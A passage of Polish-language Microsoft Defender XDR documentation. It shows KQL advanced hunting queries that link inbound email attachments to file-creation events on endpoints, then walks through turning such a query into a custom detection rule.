| where AttachmentCount > 0 and EmailDirection == "Inbound"

  5. Następnie dołącz informacje o załączniku (na przykład: nazwa pliku, skróty) do zestawu wyników. W tym celu dołącz do tabeli EmailAttachmentInfo . Typowe pola, które mają być używane do łączenia, w tym przypadku to NetworkMessageId i RecipientObjectId.

    Poniższe zapytanie zawiera również dodatkowy wiersz "| project-rename EmailTimestamp=Timestamp", która pomoże określić, który sygnatura czasowa była powiązana z wiadomością e-mail a znacznikami czasu związanymi z akcjami pliku, które dodasz w następnym kroku.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId

  6. Następnie użyj wartości SHA256 z tabeli EmailAttachmentInfo , aby znaleźć element DeviceFileEvents (akcje plików , które wystąpiły w punkcie końcowym) dla tego skrótu. Typowym polem będzie skrót SHA256 dla załącznika.

    Tabela wynikowa zawiera teraz szczegóły z punktu końcowego (Ochrona punktu końcowego w usłudze Microsoft Defender), takie jak nazwa urządzenia, jaka akcja została wykonana (w tym przypadku przefiltrowana w celu uwzględnienia tylko zdarzeń FileCreated) i miejsca przechowywania pliku. Zostanie również uwzględniona nazwa konta skojarzona z procesem.

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"

    Utworzono zapytanie, które będzie identyfikować wszystkie przychodzące wiadomości e-mail, w których użytkownik otworzył lub zapisał załącznik. Możesz również uściślić to zapytanie, aby filtrować pod kątem określonych domen nadawcy, rozmiarów plików, typów plików itd.

  7. Funkcje to specjalny rodzaj sprzężenia, który umożliwia ściąganie większej ilości danych TI dotyczących pliku, takich jak jego częstość występowania, informacje o podpisywaniem i wystawcy itp. Aby uzyskać więcej szczegółów na temat pliku, użyj wzbogacenia funkcji FileProfile( ):

    EmailEvents
| where AttachmentCount > 0 and EmailDirection == "Inbound"
| project-rename EmailTimestamp=Timestamp
| join EmailAttachmentInfo on NetworkMessageId, RecipientObjectId
| join DeviceFileEvents on SHA256
| where ActionType == "FileCreated"
| distinct SHA1
| invoke FileProfile()

Tworzenie wykrywania

Po utworzeniu zapytania identyfikującego informacje, o których chcesz otrzymywać alerty , jeśli wystąpią w przyszłości, możesz utworzyć wykrywanie niestandardowe na podstawie zapytania.

Wykrywanie niestandardowe spowoduje uruchomienie zapytania zgodnie z ustawioną częstotliwością, a wyniki zapytań będą tworzyć alerty zabezpieczeń na podstawie wybranych zasobów, których dotyczy problem. Te alerty będą skorelowane ze zdarzeniami i mogą być klasyfikowane jako każdy inny alert zabezpieczeń wygenerowany przez jeden z produktów.

  1. Na stronie zapytania usuń wiersze 7 i 8 dodane w kroku 7 instrukcji wyszukiwania zagrożeń w języku Go i kliknij pozycję Utwórz regułę wykrywania.

    Zrzut ekranu przedstawiający sekcję edytowania zapytań na stronie Zaawansowane wyszukiwanie zagrożeń w portalu Microsoft Defender.

    Uwaga

    Jeśli klikniesz pozycję Utwórz regułę wykrywania i w zapytaniu wystąpią błędy składniowe, reguła wykrywania nie zostanie zapisana. Sprawdź dokładnie zapytanie, aby upewnić się, że nie ma żadnych błędów.

  2. Wypełnij wymagane pola informacjami, które umożliwią zespołowi ds. zabezpieczeń zrozumienie alertu, przyczyny jego wygenerowania i oczekiwanych akcji.

    Zrzut ekranu przedstawiający stronę Szczegóły alertu w portalu Microsoft Defender.

    Upewnij się, że pola są wypełniane z przejrzystością, aby ułatwić następnemu użytkownikowi podjęcie świadomej decyzji dotyczącej tego alertu reguły wykrywania

  3. Wybierz jednostki, których dotyczy ten alert. W tym przypadku wybierz pozycję Urządzenie i skrzynka pocztowa.

    Zrzut ekranu przedstawiający stronę szczegółów jednostek, na które ma wpływ, w portalu Microsoft Defender.

  4. Określ, jakie akcje powinny być wykonywane, jeśli alert zostanie wyzwolony. W takim przypadku uruchom skanowanie antywirusowe, chociaż można podjąć inne akcje.

    Zrzut ekranu przedstawiający stronę Akcje w portalu Microsoft Defender.

  5. Wybierz zakres reguły alertu. Ponieważ to zapytanie obejmuje urządzenia, grupy urządzeń są istotne w tym wykrywaniu niestandardowym zgodnie z kontekstem Ochrona punktu końcowego w usłudze Microsoft Defender. Podczas tworzenia wykrywania niestandardowego, które nie obejmuje urządzeń jako jednostek, których dotyczy problem, zakres nie ma zastosowania.

    Zrzut ekranu przedstawiający stronę Zakres w portalu Microsoft Defender.

    W przypadku tego pilotażu można ograniczyć tę regułę do podzestawu urządzeń testowych w środowisku produkcyjnym.

  6. Wybierz pozycję Utwórz. Następnie wybierz pozycję Niestandardowe reguły wykrywania z panelu nawigacyjnego.

    Zrzut ekranu przedstawiający opcję Niestandardowe reguły reguł wykrywania w portalu Microsoft Defender.

    Zrzut ekranu strony przedstawiający reguły wykrywania i szczegóły wykonywania w portalu Microsoft Defender.

    Na tej stronie możesz wybrać regułę wykrywania, która otworzy stronę szczegółów.

    Zrzut ekranu przedstawiający stronę zawierającą szczegóły wyzwolonych alertów w portalu Microsoft Defender.

Szkolenie ekspertów w zakresie zaawansowanego wyszukiwania zagrożeń

Śledzenie przeciwnika to seria audycji internetowych dla nowych analityków bezpieczeństwa i doświadczonych łowców zagrożeń. Prowadzi cię przez podstawy zaawansowanego wyszukiwania zagrożeń aż do tworzenia własnych zaawansowanych zapytań.

Aby rozpocząć, zobacz Get expert training on advanced hunting (Uzyskiwanie specjalistycznych szkoleń dotyczących zaawansowanego wyszukiwania zagrożeń ).

Następny krok

Dołączanie informacji z obszaru Badanie i reagowanie przy użyciu Microsoft Defender XDR w procesach SecOps.